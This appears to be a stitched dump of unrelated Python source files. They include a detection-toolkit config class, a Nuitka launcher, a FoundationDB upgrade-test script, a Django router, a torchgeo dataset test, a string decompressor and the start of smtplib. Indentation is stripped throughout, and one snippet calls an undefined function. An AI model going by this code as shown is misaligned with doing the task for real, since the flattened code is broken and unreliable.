# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Default Configurations script. Avoids changing configs of all experiments if general settings are to be changed."""
import os
class DefaultConfigs:
def __init__(self, model, server_env=None, dim=2):
self.server_env = server_env
#########################
# I/O #
#########################
self.model = model
self.dim = dim
# int [0 < dataset_size]. select n patients from dataset for prototyping.
self.select_prototype_subset = None
# some default paths.
self.backbone_path = 'models/backbone.py'
self.source_dir = os.path.dirname(os.path.realpath(__file__)) #current dir.
self.input_df_name = 'info_df.pickle'
self.model_path = 'models/{}.py'.format(self.model)
if server_env:
self.source_dir = '/home/jaegerp/code/mamma_code/medicaldetectiontoolkit'
#########################
# Data Loader #
#########################
#random seed for fold_generator and batch_generator.
self.seed = 0
#number of threads for multithreaded batch generation.
self.n_workers = 2
# if True, segmentation losses learn all categories, else only foreground vs. background.
self.class_specific_seg_flag = False
#########################
# Architecture #
#########################
self.weight_decay = 0.0
# nonlinearity to be applied after convs with nonlinearity. one of 'relu' or 'leaky_relu'
self.relu = 'relu'
# if True initializes weights as specified in model script. else use default Pytorch init.
self.custom_init = False
# if True adds high-res decoder levels to feature pyramid: P1 + P0. (e.g. set to true in retina_unet configs)
self.operate_stride1 = False
#########################
# Schedule #
#########################
# number of folds in cross validation.
self.n_cv_splits = 5
# number of probabilistic samples in validation.
self.n_probabilistic_samples = None
#########################
# Testing / Plotting #
#########################
# perform mirroring at test time. (only XY. Z not done to not blow up predictions times).
self.test_aug = True
# if True, test data lies in a separate folder and is not part of the cross validation.
self.hold_out_test_set = False
# if hold_out_test_set provided, ensemble predictions over models of all trained cv-folds.
self.ensemble_folds = False
# color specifications for all box_types in prediction_plot.
self.box_color_palette = {'det': 'b', 'gt': 'r', 'neg_class': 'purple',
'prop': 'w', 'pos_class': 'g', 'pos_anchor': 'c', 'neg_anchor': 'c'}
# scan over confidence score in evaluation to optimize it on the validation set.
self.scan_det_thresh = False
# plots roc-curves / prc-curves in evaluation.
self.plot_stat_curves = False
# evaluates average precision per image and averages over images. instead computing one ap over data set.
self.per_patient_ap = False
# threshold for clustering 2D box predictions to 3D Cubes. Overlap is computed in XY.
self.merge_3D_iou = 0.1
# monitor any value from training.
self.n_monitoring_figures = 1
# dict to assign specific plot_values to monitor_figures > 0. {1: ['class_loss'], 2: ['kl_loss', 'kl_sigmas']}
self.assign_values_to_extra_figure = {}
# save predictions to csv file in experiment dir.
self.save_preds_to_csv = True
# select a maximum number of patient cases to test. number or "all" for all
self.max_test_patients = "all"
#########################
# MRCNN #
#########################
# if True, mask loss is not applied. used for data sets, where no pixel-wise annotations are provided.
self.frcnn_mode = False
# if True, unmolds masks in Mask R-CNN to full-res for plotting/monitoring.
self.return_masks_in_val = False
self.return_masks_in_test = False # needed if doing instance segmentation. evaluation not yet implemented.
# add P6 to Feature Pyramid Network.
self.sixth_pooling = False
# for probabilistic detection
self.n_latent_dims = 0
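# Minimal sketch (added; the class name and overridden values are assumptions,
# not this repository's real experiment configs): an experiment config would
# typically subclass DefaultConfigs and override only what it needs, e.g.
#
# class Configs(DefaultConfigs):
#     def __init__(self, server_env=None):
#         super().__init__(model="retina_unet", server_env=server_env, dim=2)
#         self.n_workers = 8
#         self.hold_out_test_set = True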
|
py | 7df9fa402263361b5e690dc6d900fd16b67aa4c6 | #!/usr/bin/env python
# Copyright 2018, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Launcher for doc/code sync release tool.
"""
import os
import sys
# Unchanged, running from checkout, use the parent directory, the nuitka
# package ought be there.
sys.path.insert(
0,
os.path.normpath(
os.path.join(
os.path.dirname(__file__),
"..",
)
)
)
from nuitka.tools.release.sync_doc.__main__ import main # isort:skip
main()
|
py | 7df9fba717fe4e2fa76c572bdfcbea4b4833f080 | import random
values = [random.normalvariate(1, 0.5) for i in range(1000)]
quick_check(values)  # quick_check is assumed to be defined elsewhere in the original source
# example output: (0.990099111944864, 0.5029847005836282)
|
py | 7df9fdacc389093f92f7c6600219d4dc77fa72fd | #!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = [
"7.2.0",
"7.1.3",
"7.1.2",
"7.1.1",
"7.1.0",
"7.0.0",
"6.3.24",
"6.3.23",
"6.3.22",
"6.3.18",
"6.3.17",
"6.3.16",
"6.3.15",
"6.3.13",
"6.3.12",
"6.3.9",
"6.2.30",
"6.2.29",
"6.2.28",
"6.2.27",
"6.2.26",
"6.2.25",
"6.2.24",
"6.2.23",
"6.2.22",
"6.2.21",
"6.2.20",
"6.2.19",
"6.2.18",
"6.2.17",
"6.2.16",
"6.2.15",
"6.2.10",
"6.1.13",
"6.1.12",
"6.1.11",
"6.1.10",
"6.0.18",
"6.0.17",
"6.0.16",
"6.0.15",
"6.0.14",
"5.2.8",
"5.2.7",
"5.1.7",
"5.1.6",
]
CLUSTER_ACTIONS = ["wiggle"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
LOCAL_OLD_BINARY_REPO = "/opt/foundationdb/old/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TESTER_STATS_INTERVAL_SEC = 5
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable_path(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
ver_tuple = version_from_str(ver_str)
return ver_tuple[0] * 100 + ver_tuple[1] * 10
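# Illustrative values for the helpers above (added comment, not in the original):
# version_from_str("7.1.3") -> [7, 1, 3]
# api_version_from_str("7.1.3") -> 710  (major*100 + minor*10)
# version_before("6.3.24", "7.1.0") -> True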
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
def random_sleep(min_sec, max_sec):
time_sec = random.uniform(min_sec, max_sec)
print("Sleeping for {0:.3f}s".format(time_sec))
time.sleep(time_sec)
def compute_sha256(filename):
hash_function = hashlib.sha256()
with open(filename, "rb") as f:
while True:
data = f.read(128 * 1024)
if not data:
break
hash_function.update(data)
return hash_function.hexdigest()
def read_to_str(filename):
with open(filename, "r") as f:
return f.read()
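# Note (added comment): compute_sha256 and read_to_str are combined further below
# in download_old_binary; a downloaded binary is accepted only when
# compute_sha256(local_file) equals the checksum text returned by read_to_str on
# the accompanying .sha256 file.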
class UpgradeTest:
def __init__(
self,
args
):
self.build_dir = Path(args.build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(args.build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(args.build_dir)
self.upgrade_path = args.upgrade_path
self.used_versions = set(self.upgrade_path).difference(set(CLUSTER_ACTIONS))
for version in self.used_versions:
assert version in SUPPORTED_VERSIONS, "Unsupported version or cluster action {}".format(version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform
)
self.tmp_dir = self.build_dir.joinpath("tmp", random_secret_string(16))
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath("tmp", "old_binaries")
self.local_binary_repo = Path(LOCAL_OLD_BINARY_REPO)
if not self.local_binary_repo.exists():
self.local_binary_repo = None
self.download_old_binaries()
self.create_external_lib_dir()
init_version = self.upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
args.process_number,
create_config=False,
redundancy=args.redundancy
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8))
)
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8))
)
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
self.api_version = None
self.tester_retcode = None
self.tester_proc = None
self.output_pipe = None
self.tester_bin = None
self.ctrl_pipe = None
# Check if the binaries for the given version are available in the local old binaries repository
def version_in_local_repo(self, version):
return (self.local_binary_repo is not None) and (self.local_binary_repo.joinpath(version).exists())
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
elif self.version_in_local_repo(version):
return self.local_binary_repo.joinpath(version, "bin", "{}-{}".format(bin_name, version))
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(
self, version, target_bin_name, remote_bin_name, make_executable
):
local_file = self.download_dir.joinpath(version, target_bin_name)
if local_file.exists():
return
# Download to a temporary file and then replace the target file atomically
# to avoid consistency errors in case of multiple tests are downloading the
# same file in parallel
local_file_tmp = Path("{}.{}".format(str(local_file), random_secret_string(8)))
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT, version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file_tmp))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS + 1):
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS:
assert False, "Failed to download {} after {} attempts".format(
local_file_tmp, MAX_DOWNLOAD_ATTEMPTS
)
try:
print("Downloading '{}' to '{}'...".format(remote_file, local_file_tmp))
request.urlretrieve(remote_file, local_file_tmp)
print("Downloading '{}' to '{}'...".format(remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
except Exception as e:
print("Retrying on error:", e)
continue
assert local_file_tmp.exists(), "{} does not exist".format(local_file_tmp)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
actual_checksum = compute_sha256(local_file_tmp)
if expected_checksum == actual_checksum:
print("Checksum OK")
break
print(
"Checksum mismatch. Expected: {} Actual: {}".format(
expected_checksum, actual_checksum
)
)
os.rename(local_file_tmp, local_file)
os.remove(local_sha256)
if make_executable:
make_executable_path(local_file)
# Copy a client library file from the local old binaries repository
# The file needs to be renamed to libfdb_c.so, because it is loaded with this name by fdbcli
def copy_clientlib_from_local_repo(self, version):
dest_lib_file = self.download_dir.joinpath(version, "libfdb_c.so")
if dest_lib_file.exists():
return
# Avoid race conditions in case of parallel test execution by first copying to a temporary file
# and then renaming it atomically
dest_file_tmp = Path("{}.{}".format(str(dest_lib_file), random_secret_string(8)))
src_lib_file = self.local_binary_repo.joinpath(version, "lib", "libfdb_c-{}.so".format(version))
assert src_lib_file.exists(), "Missing file {} in the local old binaries repository".format(src_lib_file)
self.download_dir.joinpath(version).mkdir(parents=True, exist_ok=True)
shutil.copyfile(src_lib_file, dest_file_tmp)
os.rename(dest_file_tmp, dest_lib_file)
assert dest_lib_file.exists(), "{} does not exist".format(dest_lib_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.used_versions:
if version == CURRENT_VERSION:
continue
if self.version_in_local_repo(version):
self.copy_clientlib_from_local_repo(version)
continue
self.download_old_binary(
version, "fdbserver", "fdbserver.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbmonitor", "fdbmonitor.{}".format(self.platform), True
)
self.download_old_binary(
version, "fdbcli", "fdbcli.{}".format(self.platform), True
)
self.download_old_binary(
version, "libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False
)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.used_versions:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version)
)
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if "processes" not in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if num_proc != self.cluster.process_number:
print(
"Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number
)
)
time.sleep(1)
continue
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert (
proc_ver == self.cluster_version
), "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver
)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if version_before(version, "7.1.0"):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.used_versions:
self.api_version = min(api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [
self.tester_bin,
"--cluster-file",
self.cluster.cluster_file,
"--test-file",
test_file,
"--external-client-dir",
self.external_lib_dir,
"--disable-local-client",
"--input-pipe",
self.input_pipe_path,
"--output-pipe",
self.output_pipe_path,
"--api-version",
str(self.api_version),
"--log",
"--log-dir",
self.log,
"--tmp-dir",
self.tmp_dir,
"--transaction-retry-limit",
str(TRANSACTION_RETRY_LIMIT),
"--stats-interval",
str(TESTER_STATS_INTERVAL_SEC*1000)
]
if RUN_WITH_GDB:
cmd_args = ["gdb", "-ex", "run", "--args"] + cmd_args
print(
"Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])
)
)
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr
)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if self.tester_retcode != 0:
print("Tester failed with return code {}".format(self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
finally:
# If the tester failed to initialize, other threads of the test may stay
# blocked on trying to open the named pipes
if self.ctrl_pipe is None or self.output_pipe is None:
print("Tester failed before initializing named pipes. Aborting the test")
os._exit(1)
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self):
self.progress_event.clear()
os.write(self.ctrl_pipe, b"CHECK\n")
self.progress_event.wait(None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if self.progress_event.is_set():
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version
)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, "r")
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if msg == "CHECK_OK":
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
self.ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check()
random_sleep(0.0, 2.0)
for entry in self.upgrade_path[1:]:
if entry == "wiggle":
self.cluster.cluster_wiggle()
else:
assert entry in self.used_versions, "Unexpected entry in the upgrade path: {}".format(entry)
self.upgrade_to(entry)
self.health_check()
self.progress_check()
os.write(self.ctrl_pipe, b"STOP\n")
finally:
os.close(self.ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
except Exception:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity, self.cluster.log.as_posix()
)
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
sev40s = (
subprocess.getoutput(
"grep -r 'Severity=\"40\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false "
"positives in some cases! "
):
continue
if err_cnt < error_limit:
print(line)
err_cnt += 1
if err_cnt > 0:
print(">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails".format(err_cnt))
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
sev30s = (
subprocess.getoutput(
"grep -r 'Severity=\"30\"' {}".format(self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
if len(sev30s) == 0:
print("No warnings found in logs")
else:
print(
">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)
)
)
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
"--upgrade-path",
nargs="+",
help="Cluster upgrade path: a space separated list of versions.\n" +
"The list may also contain cluster change actions: {}".format(CLUSTER_ACTIONS),
default=[CURRENT_VERSION],
)
parser.add_argument(
"--test-file",
help="A .toml file describing a test workload to be generated with fdb_c_api_tester",
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
type=int,
default=0,
)
parser.add_argument(
"--redundancy",
help="Database redundancy level (default: single)",
type=str,
default="single",
)
parser.add_argument(
"--disable-log-dump",
help="Do not dump cluster log on error",
action="store_true",
)
parser.add_argument(
"--run-with-gdb", help="Execute the tester binary from gdb", action="store_true"
)
args = parser.parse_args()
if args.process_number == 0:
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
assert len(args.upgrade_path) > 0, "Upgrade path must be specified"
assert args.upgrade_path[0] in SUPPORTED_VERSIONS, "Upgrade path must begin with a valid version number"
if args.run_with_gdb:
RUN_WITH_GDB = True
errcode = 1
with UpgradeTest(args) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
py | 7df9fdc12df4ea883f021b36554cd6acfffc41e2 | from django.conf.urls import url
from rest_framework.routers import SimpleRouter
from django.urls import path
from rest_framework.routers import DefaultRouter
from . import views
class OptionalSlashRouter(SimpleRouter):
def __init__(self, trailing_slash='/?'):
self.trailing_slash = trailing_slash
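# Note (added comment): super(SimpleRouter, self).__init__() deliberately skips
# SimpleRouter.__init__, which would otherwise reset self.trailing_slash and
# discard the '/?' optional-slash regex set above; only the base router's
# initialisation runs.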
super(SimpleRouter, self).__init__()
router = OptionalSlashRouter()
urlpatterns = [
]
router = DefaultRouter()
router.register(r'uploads', views.UploadViewSet, basename='uploads')
urlpatterns += router.urls
|
py | 7df9fe5dd2bb23a73fa87487b1777d1668a266b2 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import builtins
import os
from pathlib import Path
from typing import Any, Generator
import matplotlib.pyplot as plt
import pytest
import torch
import torch.nn as nn
from _pytest.fixtures import SubRequest
from _pytest.monkeypatch import MonkeyPatch
from torchgeo.datasets import So2Sat
pytest.importorskip("h5py")
class TestSo2Sat:
@pytest.fixture(params=["train", "validation", "test"])
def dataset(
self, monkeypatch: Generator[MonkeyPatch, None, None], request: SubRequest
) -> So2Sat:
md5s = {
"train": "2fa6b9d8995e3b6272af42719f05aaa2",
"validation": "fe3dbf74971766d5038f6cbc0b1390ae",
"test": "87d428eff44267ca642fc739cc442331",
}
monkeypatch.setattr(So2Sat, "md5s", md5s) # type: ignore[attr-defined]
root = os.path.join("tests", "data", "so2sat")
split = request.param
transforms = nn.Identity() # type: ignore[attr-defined]
return So2Sat(root, split, transforms, checksum=True)
@pytest.fixture
def mock_missing_module(
self, monkeypatch: Generator[MonkeyPatch, None, None]
) -> None:
import_orig = builtins.__import__
def mocked_import(name: str, *args: Any, **kwargs: Any) -> Any:
if name == "h5py":
raise ImportError()
return import_orig(name, *args, **kwargs)
monkeypatch.setattr( # type: ignore[attr-defined]
builtins, "__import__", mocked_import
)
def test_getitem(self, dataset: So2Sat) -> None:
x = dataset[0]
assert isinstance(x, dict)
assert isinstance(x["image"], torch.Tensor)
assert isinstance(x["label"], torch.Tensor)
def test_len(self, dataset: So2Sat) -> None:
assert len(dataset) == 10
def test_out_of_bounds(self, dataset: So2Sat) -> None:
# h5py at version 2.10.0 raises a ValueError instead of an IndexError so we
# check for both here
with pytest.raises((IndexError, ValueError)):
dataset[10]
def test_invalid_split(self) -> None:
with pytest.raises(AssertionError):
So2Sat(split="foo")
def test_not_downloaded(self, tmp_path: Path) -> None:
with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
So2Sat(str(tmp_path))
def test_plot(self, dataset: So2Sat) -> None:
x = dataset[0].copy()
dataset.plot(x, suptitle="Test")
plt.close()
dataset.plot(x, show_titles=False)
plt.close()
x["prediction"] = x["label"].clone()
dataset.plot(x)
plt.close()
def test_mock_missing_module(
self, dataset: So2Sat, mock_missing_module: None
) -> None:
with pytest.raises(
ImportError,
match="h5py is not installed and is required to use this dataset",
):
So2Sat(dataset.root)
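# To run only this test module (added comment; the path is an assumption based on
# the usual torchgeo layout, and pytest plus h5py must be installed):
#   pytest tests/datasets/test_so2sat.py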
|
py | 7df9fe87f6a468143b3189dc1bf5675d3e087c96 | #!/usr/bin/python3
def decompressSize(compressed, recurse):
index = 0
size = 0
while "(" in compressed[index:]:
markerLoc = compressed[index:].find("(")
closeLoc = compressed[index:].find(")")
size += markerLoc
marker = compressed[(index+markerLoc+1):(index+closeLoc)]
markerString = "".join(marker)
splitMarker = markerString.split("x")
length = int(splitMarker[0])
multiplier = int(splitMarker[1])
substring = compressed[(index+closeLoc+1):(index+closeLoc+1+length)]
if recurse and "(" in substring:
substringSize = decompressSize(substring, recurse)
else:
substringSize = len(substring)
size += (substringSize * multiplier)
index += closeLoc + 1 + length
size += len(compressed[index:])
return size
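# Worked examples (added comments; values follow the Advent of Code 2016 day 9 spec):
# decompressSize("X(8x2)(3x3)ABCY", False) -> 18  (markers inside repeated data are not expanded)
# decompressSize("X(8x2)(3x3)ABCY", True)  -> 20  (fully recursive expansion)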
raw = input("? ")
print(decompressSize(raw, False))
print(decompressSize(raw, True))
|
py | 7df9ff4ee510b2c6446b3b7ab49c2afdf782904a | #! /usr/bin/env python3
'''SMTP/ESMTP client class.
This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP
Authentication) and RFC 2487 (Secure SMTP over TLS).
Notes:
Please remember, when doing ESMTP, that the names of the SMTP service
extensions are NOT the same thing as the option keywords for the RCPT
and MAIL commands!
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> print(s.help())
This is Sendmail version 8.8.4
Topics:
HELO EHLO MAIL RCPT DATA
RSET NOOP QUIT HELP VRFY
EXPN VERB ETRN DSN
For more info use "HELP <topic>".
To report bugs in the implementation send email to
[email protected].
For local information send email to Postmaster at your site.
End of HELP info
>>> s.putcmd("vrfy","someone@here")
>>> s.getreply()
(250, "Somebody OverHere <[email protected]>")
>>> s.quit()
'''
# Author: The Dragon De Monsyne <[email protected]>
# ESMTP support, test code and doc fixes added by
# Eric S. Raymond <[email protected]>
# Better RFC 821 compliance (MAIL and RCPT, and CRLF in data)
# by Carey Evans <[email protected]>, for picky mail servers.
# RFC 2554 (authentication) support by Gerhard Haering <[email protected]>.
#
# This was modified from the Python 1.5 library HTTP lib.
import socket
import io
import re
import email.utils
import email.message
import email.generator
import base64
import hmac
import copy
import datetime
import sys
from email.base64mime import body_encode as encode_base64
__all__ = ["SMTPException", "SMTPServerDisconnected", "SMTPResponseException",
"SMTPSenderRefused", "SMTPRecipientsRefused", "SMTPDataError",
"SMTPConnectError", "SMTPHeloError", "SMTPAuthenticationError",
"quoteaddr", "quotedata", "SMTP"]
SMTP_PORT = 25
SMTP_SSL_PORT = 465
CRLF = "\r\n"
bCRLF = b"\r\n"
_MAXLINE = 8192 # more than 8 times larger than RFC 821, 4.5.3
OLDSTYLE_AUTH = re.compile(r"auth=(.*)", re.I)
# Exception classes used by this module.
class SMTPException(OSError):
"""Base class for all exceptions raised by this module."""
class SMTPNotSupportedError(SMTPException):
"""The command or option is not supported by the SMTP server.
This exception is raised when an attempt is made to run a command or a
command with an option which is not supported by the server.
"""
class SMTPServerDisconnected(SMTPException):
"""Not connected to any SMTP server.
This exception is raised when the server unexpectedly disconnects,
or when an attempt is made to use the SMTP instance before
connecting it to a server.
"""
class SMTPResponseException(SMTPException):
"""Base class for all exceptions that include an SMTP error code.
These exceptions are generated in some instances when the SMTP
server returns an error code. The error code is stored in the
`smtp_code' attribute of the error, and the `smtp_error' attribute
is set to the error message.
"""
def __init__(self, code, msg):
self.smtp_code = code
self.smtp_error = msg
self.args = (code, msg)
class SMTPSenderRefused(SMTPResponseException):
"""Sender address refused.
In addition to the attributes set by on all SMTPResponseException
exceptions, this sets `sender' to the string that the SMTP refused.
"""
def __init__(self, code, msg, sender):
self.smtp_code = code
self.smtp_error = msg
self.sender = sender
self.args = (code, msg, sender)
class SMTPRecipientsRefused(SMTPException):
"""All recipient addresses refused.
The errors for each recipient are accessible through the attribute
'recipients', which is a dictionary of exactly the same sort as
SMTP.sendmail() returns.
"""
def __init__(self, recipients):
self.recipients = recipients
self.args = (recipients,)
class SMTPDataError(SMTPResponseException):
"""The SMTP server didn't accept the data."""
class SMTPConnectError(SMTPResponseException):
"""Error during connection establishment."""
class SMTPHeloError(SMTPResponseException):
"""The server refused our HELO reply."""
class SMTPAuthenticationError(SMTPResponseException):
